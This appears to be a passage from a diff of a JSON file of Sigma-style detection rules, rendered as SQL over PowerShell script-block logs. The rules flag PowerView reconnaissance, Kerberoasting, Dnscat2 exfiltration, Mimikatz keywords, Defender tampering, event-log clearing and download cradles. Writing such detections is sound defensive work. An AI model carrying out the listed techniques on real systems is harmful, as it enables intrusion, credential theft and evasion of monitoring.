ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_susp_new_psdrive.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", - "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "status": "experimental", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline 
module", + "author": "Ali Alwashali", "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Legitimate script that disables the command history" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "title": "Modify Group Policy Settings - ScriptBlockLogging", + "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "status": "experimental", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel 
IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_modify_group_policy_settings.yml" }, { - "title": "Troubleshooting Pack Cmdlet Execution", - "id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "title": "WMIC Unquoted Services Path Lookup - PowerShell", + "id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "status": "experimental", - "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-TroubleshootingPack%' ESCAPE '\\' AND ScriptBlockText LIKE '%C:\\\\Windows\\\\Diagnostics\\\\System\\\\PCW%' ESCAPE '\\' AND ScriptBlockText LIKE '%-AnswerFile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Unattended%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel 
IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject %' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi %' ESCAPE '\\') AND ScriptBlockText LIKE '% Win32\\_Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%Name%' ESCAPE '\\' AND ScriptBlockText LIKE '%DisplayName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PathName%' ESCAPE '\\' AND ScriptBlockText LIKE '%StartMode%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_follina_execution.yml" + "filename": "posh_ps_wmi_unquoted_service_search.yml" }, { - "title": "Suspicious GetTypeFromCLSID ShellExecute", - "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "status": "experimental", - "description": "Detects suspicious Powershell code that execute COM Objects", + "title": "Get-ADUser Enumeration Using UserAccountControl Flags", + "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "status": "test", + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" ], - "filename": 
"posh_ps_susp_gettypefromclsid.yml" + "filename": "posh_ps_as_rep_roasting.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - PS Script", - "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", - "falsepositives": [ - "Legitimate use of the library" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" - ], - "filename": "posh_ps_download_com_cradles.yml" - }, - { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", 
"tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -5917,427 +5775,462 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Manipulation of User Computer or Group Security Principals Across AD", - "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "title": "Suspicious IO.FileStream", + "id": 
"70ad982f-67c8-40e0-a955-b920c2fa05cb", "status": "test", - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1136.002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" ], - "filename": "posh_ps_directoryservices_accountmanagement.yml" + "filename": "posh_ps_susp_iofilestream.yml" }, { - "title": "WMIC Unquoted Services Path Lookup - PowerShell", - "id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "title": "PowerShell Write-EventLog Usage", + "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. 
The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject %' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi %' ESCAPE '\\') AND ScriptBlockText LIKE '% Win32\\_Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%Name%' ESCAPE '\\' AND ScriptBlockText LIKE '%DisplayName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PathName%' ESCAPE '\\' AND ScriptBlockText LIKE '%StartMode%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" ], - "filename": "posh_ps_wmi_unquoted_service_search.yml" + "filename": "posh_ps_susp_write_eventlog.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + ], + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + }, + { + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "falsepositives": [ + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE 
'%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "title": "Suspicious Eventlog Clear", + "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.t1070.001" ], "falsepositives": [ - "Unknown" + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. 
The script should be investigated to determine if it's legitimate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_ps_susp_clear_eventlog.yml" }, { - "title": "Windows Firewall Profile Disabled", - "id": "488b44e7-3781-4a71-888d-c95abfacf44d", - "status": "experimental", - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "author": "Austin Songer @austinsonger", + "title": "Suspicious Invoke-Item From Mount-DiskImage", + "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "status": "test", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1553.005" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND 
ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml" + "filename": "posh_ps_run_from_mount_diskimage.yml" + }, + { + "title": "Manipulation of User Computer or Group Security Principals Across AD", + "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "status": "test", + 